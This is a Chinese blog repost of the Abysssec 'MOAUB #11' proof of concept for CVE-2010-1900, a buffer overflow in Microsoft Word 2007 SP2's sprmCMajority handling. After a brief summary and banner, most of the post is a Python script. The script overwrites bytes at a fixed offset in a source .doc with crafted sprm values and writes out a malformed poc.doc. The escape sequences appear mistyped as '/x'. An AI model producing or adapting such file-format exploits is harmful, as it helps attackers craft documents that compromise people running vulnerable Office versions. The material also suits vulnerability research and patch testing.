MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow -优快云博客

本文链接：https://blog.youkuaiyun.com/sz_lessnet/article/details/6005515

本文介绍了一个针对 Microsoft Office Word 2007 SP2 的 sprmCMajority 缓冲区溢出漏洞，该漏洞被评估为关键级别。文章提供了详细的分析链接，并附带了利用此漏洞生成 PoC 文件的 Python 代码示例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

'''
  __  __  ____         _    _ ____
|  //  |/ __ /   //  | |  | |  _ /
| /  / | |  | | /  / | |  | | |_) |
| |//| | |  | |/ // /| |  | |  _ <
| |  | | |__| / ____ / |__| | |_) |
|_|  |_|/____/_/    /_/____/|____/

http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/
http://www.exploit-db.com/sploits/moaub-11-exploit.zip
'''

'''
  Title               :  Microsoft Office Word sprmCMajority buffer overflow
  Version             :  Word 2007 SP 2
  Analysis           :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-1900

'''

import sys

def main():

    try:
        fdR = open('src.doc', 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:4082]
        str2 = strTotal[4088:]

        sprmCMajority = "/x47/xCA/xFF"    # sprmCMajority
        sprmPAnld80 = "/x3E/xC6/xFF"    # sprmPAnld80

        fdW= open('poc.doc', 'wb+')
        fdW.write(str1)
        fdW.write(sprmCMajority)
        fdW.write(sprmPAnld80)
        fdW.write(str2)

        fdW.close()
        fdR.close()
        print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)

if __name__ == '__main__':
    main()